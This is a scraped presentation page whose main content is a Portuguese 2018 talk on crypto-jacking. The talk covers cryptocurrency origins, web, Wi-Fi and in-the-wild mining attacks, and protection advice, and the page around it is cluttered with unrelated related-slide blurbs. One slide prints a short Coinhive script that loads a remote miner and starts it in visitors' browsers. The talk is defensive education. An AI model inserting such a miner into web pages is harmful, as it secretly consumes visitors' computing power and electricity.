Cryptocurrency - O momento do inception. Em que consiste crypto-jacking/crypto-mining. Quais são as principais ameaças e técnicas utilizadas pelos hackers. "Dicas" de proteção.
O documento resume três tópicos principais sobre segurança cibernética: 1) conceitos básicos como confidencialidade, integridade e disponibilidade da informação; 2) técnicas de ataques cibernéticos como engenharia social, phishing e malware; 3) mecanismos de segurança como políticas, firewalls e criptografia.
Palestra ministrada para alunos da FATEC-SP em Out. de 2009 sobre as principais ameaças e tendências de Segurança na Internet, além de algumas dicas de proteção.
A tecnologia blockchain (cryptoledger) e ecossistema disruptivo “pós-cloud” Fabrício Vargas Matos
O documento discute como a tecnologia blockchain e ecossistema "pós-cloud" podem ser disruptivos. Ele explica como a blockchain funciona de forma descentralizada para validar transações e impede gastos duplicados através de prova de trabalho. Também discute como essa tecnologia pode revolucionar o sistema bancário, pagamentos online e permitir novos tipos de aplicativos distribuídos.
O documento discute Bitcoin como o nascimento de uma nova "Internet" e não como dinheiro. Ele propõe um grupo para discutir Bitcoin em Vitória com o objetivo de esclarecer a tecnologia, gerar networking e incentivar o empreendedorismo local no ecossistema de Bitcoin. Também apresenta dados sobre investimentos em Bitcoin comparados à Internet em 1995 e casos de uso de Bitcoin no mundo.
Aqui de forma resumida um pouco sobre o bitcoin...
Blog Oficial: http://techcryptobr.blogspot.com.br/
Canal no YouTube: https://goo.gl/XiHufz
Comunidade no Google +: https://goo.gl/jBqTQs
Página no Facebook: https://www.facebook.com/techcryptobr
Grupo no Facebook: https://www.facebook.com/groups/techcryptobr
Twitter: https://twitter.com/jeffytavares
Skype: jeffytavares
Extensão do canal instale em seu navegador e fique sempre ligados nos vídeos: http://goo.gl/OzKovv
Eobot melhor site de mineração: https://goo.gl/pTLVK5
Minere com RDP Main: https://goo.gl/n3eam0
O documento discute como NFTs, metaverso e tecnologias blockchain podem transformar a experiência humana no futuro digital. NFTs permitirão a propriedade digital verificável e ativos interoperáveis entre plataformas, resolvendo problemas antigos de proteção de propriedade na internet. No metaverso, qualquer coisa pode ser representada como um NFT, desde roupas até casas. Juntos, esses desenvolvimentos apontar para uma internet descentralizada e aberta controlada por criadores.
O documento discute os riscos à privacidade e segurança cibernética em um mundo cada vez mais digitalizado. Apresenta conceitos de cybersecurity e privacidade e como governos e empresas privadas monitoram os cidadãos online, ameaçando seus direitos individuais. Também fornece ferramentas para proteger a privacidade na internet.
Sorria vc está sendo tokenizado. Blockchain, criptomoedas e o uso de dados pe...Wagner Tamanaha
O documento discute o uso de blockchain, criptomoedas e dados pessoais nas redes sociais e publicidade. Apresenta várias plataformas blockchain que buscam dar mais controle aos usuários sobre seus dados pessoais e privacidade nas redes.
O documento resume três tópicos principais sobre segurança cibernética: 1) conceitos básicos como confidencialidade, integridade e disponibilidade da informação; 2) técnicas de ataques cibernéticos como engenharia social, phishing e malware; 3) mecanismos de segurança como políticas, firewalls e criptografia.
Palestra ministrada para alunos da FATEC-SP em Out. de 2009 sobre as principais ameaças e tendências de Segurança na Internet, além de algumas dicas de proteção.
A tecnologia blockchain (cryptoledger) e ecossistema disruptivo “pós-cloud” Fabrício Vargas Matos
O documento discute como a tecnologia blockchain e ecossistema "pós-cloud" podem ser disruptivos. Ele explica como a blockchain funciona de forma descentralizada para validar transações e impede gastos duplicados através de prova de trabalho. Também discute como essa tecnologia pode revolucionar o sistema bancário, pagamentos online e permitir novos tipos de aplicativos distribuídos.
O documento discute Bitcoin como o nascimento de uma nova "Internet" e não como dinheiro. Ele propõe um grupo para discutir Bitcoin em Vitória com o objetivo de esclarecer a tecnologia, gerar networking e incentivar o empreendedorismo local no ecossistema de Bitcoin. Também apresenta dados sobre investimentos em Bitcoin comparados à Internet em 1995 e casos de uso de Bitcoin no mundo.
Aqui de forma resumida um pouco sobre o bitcoin...
Blog Oficial: http://techcryptobr.blogspot.com.br/
Canal no YouTube: https://goo.gl/XiHufz
Comunidade no Google +: https://goo.gl/jBqTQs
Página no Facebook: https://www.facebook.com/techcryptobr
Grupo no Facebook: https://www.facebook.com/groups/techcryptobr
Twitter: https://twitter.com/jeffytavares
Skype: jeffytavares
Extensão do canal instale em seu navegador e fique sempre ligados nos vídeos: http://goo.gl/OzKovv
Eobot melhor site de mineração: https://goo.gl/pTLVK5
Minere com RDP Main: https://goo.gl/n3eam0
O documento discute como NFTs, metaverso e tecnologias blockchain podem transformar a experiência humana no futuro digital. NFTs permitirão a propriedade digital verificável e ativos interoperáveis entre plataformas, resolvendo problemas antigos de proteção de propriedade na internet. No metaverso, qualquer coisa pode ser representada como um NFT, desde roupas até casas. Juntos, esses desenvolvimentos apontar para uma internet descentralizada e aberta controlada por criadores.
O documento discute os riscos à privacidade e segurança cibernética em um mundo cada vez mais digitalizado. Apresenta conceitos de cybersecurity e privacidade e como governos e empresas privadas monitoram os cidadãos online, ameaçando seus direitos individuais. Também fornece ferramentas para proteger a privacidade na internet.
Sorria vc está sendo tokenizado. Blockchain, criptomoedas e o uso de dados pe...Wagner Tamanaha
O documento discute o uso de blockchain, criptomoedas e dados pessoais nas redes sociais e publicidade. Apresenta várias plataformas blockchain que buscam dar mais controle aos usuários sobre seus dados pessoais e privacidade nas redes.
Quem vigia os vigilantes: Liberdade vs Controle na internetWagner Reck
O documento discute os riscos crescentes à privacidade e liberdade na internet devido à vigilância em massa e centralização de dados por governos e grandes corporações. Defensores da privacidade, como os "cypherpunks", desenvolvem ferramentas para proteger os usuários, mas a tendência é de mais controle e menos transparência, a menos que haja mudanças políticas e o uso generalizado de criptografia.
Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...Symantec Brasil
O documento discute a evolução das ameaças cibernéticas para além da ficção, com exemplos de ataques reais como Stuxnet e inovações hacker como drones de espionagem e manipulação cerebral. Também aborda o crescimento do perfil dos invasores e das potenciais vítimas na América Latina devido à maior digitalização e uso da internet.
O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...Pedro Ivo Lima
O documento discute como tornar as pessoas em sensores ativos de segurança digital. Ele destaca que 95% dos ataques cibernéticos começam com phishing e que a educação e treinamento contínuos podem ajudar as pessoas a se tornarem parte ativa da estratégia de defesa contra ameaças cibernéticas.
O documento discute os riscos crescentes à privacidade online devido à vigilância governamental e corporativa, e apresenta vários projetos e iniciativas abertas que lutam por maior privacidade e segurança digital, como Signal, Let's Encrypt e Surveillance Self-Defense.
Movimentos abertos para comunicações privadasGabriel Albo
O documento discute os riscos crescentes à privacidade online devido à vigilância governamental e corporativa, e apresenta vários projetos e iniciativas abertas que estão lutando para proteger a privacidade e a segurança das comunicações, como o Signal, Crypto Cat, Let's Encrypt e Pixelated.
O documento discute projetos e tecnologias que lutam pela privacidade na internet, incluindo criptografia de mensagens, chat criptografado, autoridade de certificados gratuita e e-mail privado. Também menciona ativismo e arte, como guias de segurança para ativistas e projetos de arte que refletem sobre vigilância e consumismo na dark web. O documento enfatiza que a luta pela privacidade é colaborativa e convida o leitor a contribuir.
1) A segurança na internet é cada vez mais rara com o crescimento de golpes, fraudes e delitos contra usuários, especialmente no Brasil e na China.
2) Os cavalos de tróia que roubam informações via spam são a maior ameaça.
3) É preciso tomar cuidados como não clicar em links suspeitos, criar senhas fortes e manter dados pessoais em local seguro.
Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...Joao Barreto Fernandes
Reflexão sobre o futuro da Sociedade quando analisando os riscos e ameaças crescentes que a (In)Segurança da Informação, principalmente a gerada na e para a Internet, coloca.
O documento discute os perigos do ransomware, como funciona e como se proteger. Ele explica o que é ransomware, como os criminosos atuam para infectar sistemas e pedir resgate em bitcoins. Também fornece cinco razões para não pagar o resgate e estratégias de proteção como firewalls, antivírus e backups frequentes.
O documento discute a segurança da informação e a criptografia. Aborda conceitos como confidencialidade, integridade e criptografia simétrica e assimétrica. Também apresenta exemplos de como a criptografia pode ser aplicada para proteger bancos de dados e comunicações por email.
Kriptacoin Apresentação das moedas virtuaisLucas Feat
Kriptacoin é uma criptomoeda descentralizada utilizada como forma de pagamento que teve 521% de valorização em seu primeiro mês. Sua popularização se deu através da rede binária WS Corporate e mercados externos que aderiram. Kriptacoins podem ser adquiridas por exchanges, rede binária ou kripta mining, que quebra blocos criptografados em nuvens para gerar novas moedas.
Apresentação kriptacoin - Conheça nosso plano de negócio.Jorge Ciriaco
Kriptacoin é uma moeda digital descentralizada que teve 521% de valorização em seu primeiro mês e vem ganhando popularidade através da rede binária WS Corporate e mercados externos. Kriptacoins podem ser adquiridas por plataformas de troca, a rede binária ou Kripta Mining, que quebra blocos criptografados em nuvens para gerar novas moedas.
1) Os golpes online estão se tornando mais sofisticados com novas técnicas para enganar consumidores e obter dados pessoais.
2) Pesquisa mostra que empresas brasileiras investem pouco em segurança cibernética.
3) É fundamental proteger sistemas digitais contra ameaças como vírus e hackers.
Cybersecurty for People - PhishX Summit de Maio/2018PhishX
Cybersecurity for People: os impactos das ameaças digitais em nossa sociedade, como o phishing e o ransomware, no Brasil e no mundo. Descubra as estatísticas mais recentes sobre os ataques e o comportamento humano frente a estas ameaças, saiba como se defender pessoalmente e defender a sua empresa, frente ao panorama atual e tendências tecnológicas globais.
Apresentação realizada no PhishX Summit de Maio/2018, no inovaBra habitat, pelo Pedro Ivo, CEO e Co-Founder da PhishX.
O documento discute economia da informação, espaço cibernético e ações cibernéticas. Aborda tópicos como oferta e demanda de informação, valor da informação, segurança da informação, ataques cibernéticos como Stuxnet e ameaças em infraestruturas críticas.
1) O relatório analisa as tendências globais de ameaças cibernéticas em 2008, com foco na atividade maliciosa na América Latina e migração de criminosos para regiões emergentes.
2) Os criminosos digitais estão cada vez mais atacando usuários em sites legítimos com alto tráfego por meio de códigos maliciosos.
3) O número de códigos maliciosos, especialmente trojans, continua crescendo e os criminosos se organizam para obter ganhos financeiros por meio de ph
1) O relatório analisa as tendências globais de ameaças cibernéticas em 2008, com foco na atividade maliciosa na América Latina e migração de criminosos para regiões emergentes.
2) Os criminosos digitais estão cada vez mais atacando usuários em sites legítimos com alto tráfego por meio de códigos maliciosos nesses sites.
3) O número de códigos maliciosos, spam e phishing continuam crescendo, com os criminosos se organizando para obter ganhos financeiros com dados ro
Deveremos tratar, em outros artigos, outros aspectos relacionados à segurança na Web, como: aspectos relacionados à segurança da máquina, no cliente Web, dos dados em trânsito, assim como algumas recomendações para tornar seu servidor Web mais seguro
O documento discute a história da internet, desde sua criação pela ARPANET nos EUA nos anos 1960 para fins militares até seu crescimento e popularização nos anos 1990 com a criação da World Wide Web. Também aborda os riscos de segurança na internet como vírus, spyware e phishing, e a importância de proteger as crianças e se manter informado para evitar esses riscos.
O documento discute o papel da criptografia na segurança da informação, incluindo a necessidade de segurança da informação, fundamentos de criptografia e tipos de criptografia. Apresenta também mecanismos que utilizam criptografia e padrões de criptografia.
Quem vigia os vigilantes: Liberdade vs Controle na internetWagner Reck
O documento discute os riscos crescentes à privacidade e liberdade na internet devido à vigilância em massa e centralização de dados por governos e grandes corporações. Defensores da privacidade, como os "cypherpunks", desenvolvem ferramentas para proteger os usuários, mas a tendência é de mais controle e menos transparência, a menos que haja mudanças políticas e o uso generalizado de criptografia.
Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...Symantec Brasil
O documento discute a evolução das ameaças cibernéticas para além da ficção, com exemplos de ataques reais como Stuxnet e inovações hacker como drones de espionagem e manipulação cerebral. Também aborda o crescimento do perfil dos invasores e das potenciais vítimas na América Latina devido à maior digitalização e uso da internet.
O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...Pedro Ivo Lima
O documento discute como tornar as pessoas em sensores ativos de segurança digital. Ele destaca que 95% dos ataques cibernéticos começam com phishing e que a educação e treinamento contínuos podem ajudar as pessoas a se tornarem parte ativa da estratégia de defesa contra ameaças cibernéticas.
O documento discute os riscos crescentes à privacidade online devido à vigilância governamental e corporativa, e apresenta vários projetos e iniciativas abertas que lutam por maior privacidade e segurança digital, como Signal, Let's Encrypt e Surveillance Self-Defense.
Movimentos abertos para comunicações privadasGabriel Albo
O documento discute os riscos crescentes à privacidade online devido à vigilância governamental e corporativa, e apresenta vários projetos e iniciativas abertas que estão lutando para proteger a privacidade e a segurança das comunicações, como o Signal, Crypto Cat, Let's Encrypt e Pixelated.
O documento discute projetos e tecnologias que lutam pela privacidade na internet, incluindo criptografia de mensagens, chat criptografado, autoridade de certificados gratuita e e-mail privado. Também menciona ativismo e arte, como guias de segurança para ativistas e projetos de arte que refletem sobre vigilância e consumismo na dark web. O documento enfatiza que a luta pela privacidade é colaborativa e convida o leitor a contribuir.
1) A segurança na internet é cada vez mais rara com o crescimento de golpes, fraudes e delitos contra usuários, especialmente no Brasil e na China.
2) Os cavalos de tróia que roubam informações via spam são a maior ameaça.
3) É preciso tomar cuidados como não clicar em links suspeitos, criar senhas fortes e manter dados pessoais em local seguro.
Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...Joao Barreto Fernandes
Reflexão sobre o futuro da Sociedade quando analisando os riscos e ameaças crescentes que a (In)Segurança da Informação, principalmente a gerada na e para a Internet, coloca.
O documento discute os perigos do ransomware, como funciona e como se proteger. Ele explica o que é ransomware, como os criminosos atuam para infectar sistemas e pedir resgate em bitcoins. Também fornece cinco razões para não pagar o resgate e estratégias de proteção como firewalls, antivírus e backups frequentes.
O documento discute a segurança da informação e a criptografia. Aborda conceitos como confidencialidade, integridade e criptografia simétrica e assimétrica. Também apresenta exemplos de como a criptografia pode ser aplicada para proteger bancos de dados e comunicações por email.
Kriptacoin Apresentação das moedas virtuaisLucas Feat
Kriptacoin é uma criptomoeda descentralizada utilizada como forma de pagamento que teve 521% de valorização em seu primeiro mês. Sua popularização se deu através da rede binária WS Corporate e mercados externos que aderiram. Kriptacoins podem ser adquiridas por exchanges, rede binária ou kripta mining, que quebra blocos criptografados em nuvens para gerar novas moedas.
Apresentação kriptacoin - Conheça nosso plano de negócio.Jorge Ciriaco
Kriptacoin é uma moeda digital descentralizada que teve 521% de valorização em seu primeiro mês e vem ganhando popularidade através da rede binária WS Corporate e mercados externos. Kriptacoins podem ser adquiridas por plataformas de troca, a rede binária ou Kripta Mining, que quebra blocos criptografados em nuvens para gerar novas moedas.
1) Os golpes online estão se tornando mais sofisticados com novas técnicas para enganar consumidores e obter dados pessoais.
2) Pesquisa mostra que empresas brasileiras investem pouco em segurança cibernética.
3) É fundamental proteger sistemas digitais contra ameaças como vírus e hackers.
Cybersecurty for People - PhishX Summit de Maio/2018PhishX
Cybersecurity for People: os impactos das ameaças digitais em nossa sociedade, como o phishing e o ransomware, no Brasil e no mundo. Descubra as estatísticas mais recentes sobre os ataques e o comportamento humano frente a estas ameaças, saiba como se defender pessoalmente e defender a sua empresa, frente ao panorama atual e tendências tecnológicas globais.
Apresentação realizada no PhishX Summit de Maio/2018, no inovaBra habitat, pelo Pedro Ivo, CEO e Co-Founder da PhishX.
O documento discute economia da informação, espaço cibernético e ações cibernéticas. Aborda tópicos como oferta e demanda de informação, valor da informação, segurança da informação, ataques cibernéticos como Stuxnet e ameaças em infraestruturas críticas.
1) O relatório analisa as tendências globais de ameaças cibernéticas em 2008, com foco na atividade maliciosa na América Latina e migração de criminosos para regiões emergentes.
2) Os criminosos digitais estão cada vez mais atacando usuários em sites legítimos com alto tráfego por meio de códigos maliciosos.
3) O número de códigos maliciosos, especialmente trojans, continua crescendo e os criminosos se organizam para obter ganhos financeiros por meio de ph
1) O relatório analisa as tendências globais de ameaças cibernéticas em 2008, com foco na atividade maliciosa na América Latina e migração de criminosos para regiões emergentes.
2) Os criminosos digitais estão cada vez mais atacando usuários em sites legítimos com alto tráfego por meio de códigos maliciosos nesses sites.
3) O número de códigos maliciosos, spam e phishing continuam crescendo, com os criminosos se organizando para obter ganhos financeiros com dados ro
Deveremos tratar, em outros artigos, outros aspectos relacionados à segurança na Web, como: aspectos relacionados à segurança da máquina, no cliente Web, dos dados em trânsito, assim como algumas recomendações para tornar seu servidor Web mais seguro
O documento discute a história da internet, desde sua criação pela ARPANET nos EUA nos anos 1960 para fins militares até seu crescimento e popularização nos anos 1990 com a criação da World Wide Web. Também aborda os riscos de segurança na internet como vírus, spyware e phishing, e a importância de proteger as crianças e se manter informado para evitar esses riscos.
O documento discute o papel da criptografia na segurança da informação, incluindo a necessidade de segurança da informação, fundamentos de criptografia e tipos de criptografia. Apresenta também mecanismos que utilizam criptografia e padrões de criptografia.
Slides Lição 11, CPAD, A Realidade Bíblica do Inferno, 2Tr24.pptxLuizHenriquedeAlmeid6
Slideshare Lição 11, CPAD, A Realidade Bíblica do Inferno, 2Tr24, Pr Henrique, EBD NA TV, Lições Bíblicas, 2º Trimestre de 2024, adultos, Tema, A CARREIRA QUE NOS ESTÁ PROPOSTA, O CAMINHO DA SALVAÇÃO, SANTIDADE E PERSEVERANÇA PARA CHEGAR AO CÉU, Coment Osiel Gomes, estudantes, professores, Ervália, MG, Imperatriz, MA, Cajamar, SP, estudos bíblicos, gospel, DEUS, ESPÍRITO SANTO, JESUS CRISTO, Com. Extra Pr. Luiz Henrique, de Almeida Silva, tel-What, 99-99152-0454, Canal YouTube, Henriquelhas, @PrHenrique, https://ebdnatv.blogspot.com/
LIVRO MPARADIDATICO SOBRE BULLYING PARA TRABALHAR COM ALUNOS EM SALA DE AULA OU LEITURA EXTRA CLASSE, COM FOCO NUM PROBLEMA CRUCIAL E QUE ESTÁ TÃO PRESENTE NAS ESCOLAS BRASILEIRAS. OS ALUNOS PODEM LER EM SALA DE AULA. MATERIAL EXCELENTE PARA SER ADOTADO NAS ESCOLAS
Slides Lição 9, Betel, Ordenança para uma vida de santificação, 2Tr24.pptxLuizHenriquedeAlmeid6
Slideshare Lição 10, Betel, Ordenança para buscar a paz e fazer o bem, 2Tr24, Pr Henrique, EBD NA TV, 2° TRIMESTRE DE 2024, ADULTOS, EDITORA BETEL, TEMA, ORDENANÇAS BÍBLICAS, Doutrina Fundamentais Imperativas aos Cristãos para uma vida bem-sucedida e de Comunhão com DEUS, estudantes, professores, Ervália, MG, Imperatriz, MA, Cajamar, SP, estudos bíblicos, gospel, DEUS, ESPÍRITO SANTO, JESUS CRISTO, Comentários, Bispo Abner Ferreira, Com. Extra Pr. Luiz Henrique, 99-99152-0454, Canal YouTube, Henriquelhas, @PrHenrique
Atividades de Inglês e Espanhol para Imprimir - AlfabetinhoMateusTavares54
Quer aprender inglês e espanhol de um jeito divertido? Aqui você encontra atividades legais para imprimir e usar. É só imprimir e começar a brincar enquanto aprende!
1. A Nova Era do
Pedro Tavares <sirpedrotavares@gmail.com>
https://seguranca-informatica.pt
21 de março de 2018
ll Jornadas de InfoWeb
2. Agenda
● A Importância da Cibersegurança
● O que é Crypto-jacking
● Cryptocurrency - The Inception
● Tipos de Crypto-jacking
● Crypto-jacking em Páginas Web
● Crypto-jacking em Redes Wi-Fi
● Crypto-jacking “ In-the-Wild ”
● Anúncios versus Crypto-mining
● Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
3. Importância da Cibersegurança
Preocupações em 2018
● Internet of Thing (IoT)
● Mobile
● Inteligência Artificial
● Sistemas descentralizados (blockchain)
● Crypto-jacking
● (...)
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Meios e tecnologias para proteçãoCibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
4. O que é Crypto-jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
5. O que é Crypto-jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Crypto-jacking Crypto-mining
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
6. O que é Crypto-jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Crypto-jacking acontece quando o mining é feito de forma ilegal, i.e.,
sem consentimento e conhecimento
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
7. Cryptocurrency - The Inception
[1] “Security without Identification: Transaction Systems to Make Big Brother Obsolete"
https://www.cs.ru.nl/~jhh/pub/secsem/chaum1985bigbrother.pdf
[2] Cyberpunks e outras propostas de moedas criptográficas: https://www.coindesk.com/the-rise-of-the-cypherpunks/
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
8. Cryptocurrency - The Inception
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
9. Cryptocurrency - The Inception
Criptomoedas tornaram-se uma nova tendência
● Bitcoin
● Ether
● Litecoin
● NEM
● Monero
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
10. Tipos de Crypto-jacking
● Crypto-jacking em Páginas Web
● Crypto-jacking em Redes Wi-Fi
● Crypto-jacking “in-the-wild”
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
11. Crypto-jacking em Páginas Web
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
<script src=”https://coin-hive.com/lib/coinhive.min.js“></script>
<script>
var miner = new CoinHive.Anonymous(‘YOUR_TOKEN’);//Monero ID
miner.start();
</script>
Código malicioso de mineração
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
12. Crypto-jacking em redes Wi-Fi
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
13. Crypto-jacking “ In-the-Wild “
Para todo o tipo de gostos :)
● SQL Injection
● XSS + Social Engineering
● Malware
○ Dofoil (infetou mais de 500.000 computadores Windows)
○ PyCryptoMiner - SSH (dropper instala bot para minerar criptomedas)
○ Tesla Cloud — Ciber atacantes usaram processamento na Cloud
○ Plugins CMS infetados (Browsealoud, etc.)
■ Crypto-jacking em websites (Los Angels Times, Dinheiro Vivo, CR7)
○ Software e extensões com crypto-miners (Jenkins, ApacheCouchDB,
Archive Poster - extensão Google Chrome)
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
14. Anúncios versus Crypto-mining jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Motivação - Obter dinheiro fácil através da capacidade de processamento e
eletricidade de terceiros (crypto-mining => jacking
Crypto-mining jacking
Problemas:
- Pouco retorno (1k visits - 55 sec - €0.36)
- Desempenho (website, browser, PC, Internet)
- Notificação prévia + consentimento
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
15. Proteção
Ponto de vista:
Utilizador
● Opera lançou módulo nativo
● Extensão Chrome: NoCoin
● AV
● Consciencialização (estar alerta) + Ação (notificar)
Infraestrutura
● Monitorização (IDS, WAFs, etc)
● Cibersegurança contínua
● Auditorias de segurança
● Consciencialização + Ação
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
16. ~ «O meu grande bem-haja a todos» ~
Pedro Tavares <sirpedrotavares@gmail.com>